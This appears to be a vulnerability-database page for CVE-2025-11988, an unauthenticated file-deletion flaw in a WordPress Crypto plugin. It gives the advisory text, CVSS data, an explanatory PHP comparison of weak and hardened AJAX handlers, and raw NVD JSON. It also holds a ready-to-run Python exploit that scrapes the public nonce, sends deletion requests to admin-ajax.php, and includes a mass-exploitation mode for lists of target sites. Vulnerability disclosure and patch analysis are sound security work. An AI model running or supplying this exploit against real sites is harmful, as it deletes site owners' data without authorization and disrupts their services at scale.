Security Vulnerability Report
CVE-2025-11988 CVSS 5.3 MEDIUM

CVE-2025-11988

Published: 2025-11-11 04:15:45
Last Modified: 2026-04-15 00:35:42

Description

The Crypto plugin for WordPress is vulnerable to unauthorized manipulation of data in all versions up to, and including, 2.22. This is due to the plugin registering an unauthenticated AJAX action (wp_ajax_nopriv_crypto_connect_ajax_process) that allows calling the crypto_delete_json method with only a publicly-available nonce check. This makes it possible for unauthenticated attackers to delete specific JSON files matching the pattern *_pending.json within the wp-content/uploads/yak/ directory, causing data loss and denial of service for plugin workflows that rely on these artifacts.
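The description above boils down to a missing-authorization pattern (the Raw JSON below tags it CWE-862): a handler reachable through a wp_ajax_nopriv_ hook, protected only by a nonce that is itself printed into public page HTML, so the nonce proves nothing about who is calling. The sketch below is an added, illustrative example, not the Crypto plugin's own code; it contrasts that weak shape with a hardened handler that keeps the nonce check, drops the nopriv hook, adds a capability check and constrains the file name. The function names, the nonce action string, the manage_options capability and the *_pending.json check are assumptions made for the example.

```php
<?php
/**
 * Added illustrative example (not the Crypto plugin's code): weak vs. hardened
 * WordPress AJAX handler for a "delete pending JSON" method. Names marked as
 * assumed are not taken from the plugin.
 */

// ---- Weak shape, as CVE-2025-11988 describes it -------------------------------
// wp_ajax_nopriv_ makes the action callable without a session, and a nonce the
// plugin prints on public pages can be read by anyone, so it grants no authority.
add_action( 'wp_ajax_crypto_connect_ajax_process', 'example_weak_dispatch' );        // assumed name
add_action( 'wp_ajax_nopriv_crypto_connect_ajax_process', 'example_weak_dispatch' ); // the nopriv hook

function example_weak_dispatch() {
    check_ajax_referer( 'crypto_connect_nonce', 'nonce' ); // nonce action name assumed
    $method = isset( $_POST['method'] ) ? sanitize_key( wp_unslash( $_POST['method'] ) ) : '';
    if ( 'crypto_delete_json' === $method ) {
        // No current_user_can() anywhere: the pattern check limits which
        // names are accepted but never asks who is asking.
        example_weak_delete( isset( $_POST['file'] ) ? wp_unslash( $_POST['file'] ) : '' );
    }
    wp_die();
}

function example_weak_delete( $file ) {
    $upload = wp_upload_dir();
    if ( fnmatch( '*_pending.json', $file ) ) {
        unlink( trailingslashit( $upload['basedir'] ) . 'yak/' . $file );
    }
}

// ---- Hardened shape -------------------------------------------------------------
// 1. Only the logged-in hook; anonymous requests get WordPress's default "0".
// 2. Explicit capability check: a nonce proves intent, a capability proves authority.
// 3. basename() plus a strict pattern, then a realpath() containment check, so the
//    request can only name a *_pending.json file that really sits in uploads/yak/.
add_action( 'wp_ajax_crypto_connect_ajax_process', 'example_hardened_dispatch' ); // assumed name

function example_hardened_dispatch() {
    check_ajax_referer( 'crypto_connect_nonce', 'nonce' ); // still useful against CSRF
    if ( ! current_user_can( 'manage_options' ) ) {      // capability assumed
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }
    $method = isset( $_POST['method'] ) ? sanitize_key( wp_unslash( $_POST['method'] ) ) : '';
    if ( 'crypto_delete_json' !== $method ) {
        wp_send_json_error( array( 'message' => 'unknown method' ), 400 );
    }
    $file = isset( $_POST['file'] ) ? basename( wp_unslash( $_POST['file'] ) ) : '';
    if ( ! preg_match( '/^[A-Za-z0-9_-]+_pending\.json$/', $file ) ) {
        wp_send_json_error( array( 'message' => 'invalid file name' ), 400 );
    }
    $upload   = wp_upload_dir();
    $dir_real = realpath( trailingslashit( $upload['basedir'] ) . 'yak' );
    $path     = realpath( trailingslashit( $upload['basedir'] ) . 'yak/' . $file );
    // realpath() resolves symlinks and dot segments; the result must stay inside yak/.
    if ( false === $dir_real || false === $path
        || 0 !== strpos( $path, $dir_real . DIRECTORY_SEPARATOR ) || ! is_file( $path ) ) {
        wp_send_json_error( array( 'message' => 'file not found' ), 404 );
    }
    if ( ! unlink( $path ) ) {
        wp_send_json_error( array( 'message' => 'delete failed' ), 500 );
    }
    wp_send_json_success( array( 'deleted' => $file ) );
}
```

The two checks a reviewer should look for in any wp_ajax_nopriv_ handler are the ones the weak version lacks: a capability (or ownership) check before the destructive operation, and a decision about whether the action needs to be public at all. If a workflow genuinely must let anonymous visitors trigger the action, the nonce still cannot be the gate; the handler needs some other proof of authorization tied to the specific artifact being deleted.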

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Crypto plugin <= 2.22

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-11988 PoC - WordPress Crypto Plugin Unauthorized File Deletion
Author: Security Researcher
Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-11988
"""
import requests
import re
import argparse
from urllib.parse import urljoin


def get_wordpress_nonce(target_url):
    """
    Extract public nonce from WordPress page source
    """
    try:
        response = requests.get(target_url, timeout=10)
        # Try to find nonce in common locations
        nonce_patterns = [
            r'nonce[:\s]+["\']([a-zA-Z0-9]+)["\']',
            r'_wpnonce[:\s]+["\']([a-zA-Z0-9]+)["\']',
            r'crypto.*nonce["\':\s]+([a-zA-Z0-9]+)',
        ]
        for pattern in nonce_patterns:
            match = re.search(pattern, response.text, re.IGNORECASE)
            if match:
                return match.group(1)
        return None
    except requests.RequestException:
        return None


def exploit_crypto_plugin(target_url, file_to_delete):
    """
    Exploit the unauthenticated AJAX endpoint to delete JSON files
    @param target_url: Base URL of the WordPress site
    @param file_to_delete: File path relative to wp-content/uploads/yak/
    """
    # Get nonce from the site
    nonce = get_wordpress_nonce(target_url)
    if not nonce:
        print("[-] Failed to obtain nonce, attempting with common nonce value...")
        nonce = '1'  # Fallback - some implementations accept this

    # Construct AJAX endpoint
    ajax_url = urljoin(target_url, 'wp-admin/admin-ajax.php')

    # Prepare the exploit payload
    data = {
        'action': 'crypto_connect_ajax_process',
        'method': 'crypto_delete_json',
        'nonce': nonce,
        'file': file_to_delete
    }

    print(f"[*] Target: {target_url}")
    print(f"[*] AJAX Endpoint: {ajax_url}")
    print(f"[*] Using nonce: {nonce}")
    print(f"[*] Attempting to delete: {file_to_delete}")

    try:
        response = requests.post(ajax_url, data=data, timeout=10)
        print(f"[*] Response Status: {response.status_code}")
        print(f"[*] Response Body: {response.text[:500]}")
        if 'success' in response.text.lower() or response.status_code == 200:
            print("[+] File deletion request sent successfully")
            return True
        else:
            print("[-] Exploitation may have failed")
            return False
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


def mass_exploit(target_urls_file, file_pattern='*_pending.json'):
    """
    Mass exploitation against multiple targets
    """
    try:
        with open(target_urls_file, 'r') as f:
            urls = [line.strip() for line in f if line.strip()]
        for url in urls:
            print(f"\n{'=' * 60}")
            exploit_crypto_plugin(url, file_pattern)
    except FileNotFoundError:
        print(f"[-] File not found: {target_urls_file}")


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='CVE-2025-11988 Exploitation Tool')
    parser.add_argument('-u', '--url', help='Target WordPress URL')
    parser.add_argument('-f', '--file', default='transaction_pending.json',
                        help='File to delete (relative to wp-content/uploads/yak/)')
    parser.add_argument('-m', '--mass', help='File containing list of target URLs')
    args = parser.parse_args()

    if args.mass:
        mass_exploit(args.mass)
    elif args.url:
        exploit_crypto_plugin(args.url, args.file)
    else:
        parser.print_help()

References

https://plugins.trac.wordpress.org/browser/crypto/tags/2.22/includes/class-crypto_connect_ajax_register.php#L137
https://plugins.trac.wordpress.org/browser/crypto/tags/2.22/includes/class-crypto_connect_ajax_register.php#L9
https://www.wordfence.com/threat-intel/vulnerabilities/id/3281d6eb-9f14-43d4-a4d4-532993039e53?source=cve
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-11988",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-11T04:15:44.967",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Crypto plugin for WordPress is vulnerable to unauthorized manipulation of data in all versions up to, and including, 2.22. This is due to the plugin registering an unauthenticated AJAX action (wp_ajax_nopriv_crypto_connect_ajax_process) that allows calling the crypto_delete_json method with only a publicly-available nonce check. This makes it possible for unauthenticated attackers to delete specific JSON files matching the pattern *_pending.json within the wp-content/uploads/yak/ directory, causing data loss and denial of service for plugin workflows that rely on these artifacts."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/crypto/tags/2.22/includes/class-crypto_connect_ajax_register.php#L137",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/crypto/tags/2.22/includes/class-crypto_connect_ajax_register.php#L9",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3281d6eb-9f14-43d4-a4d4-532993039e53?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}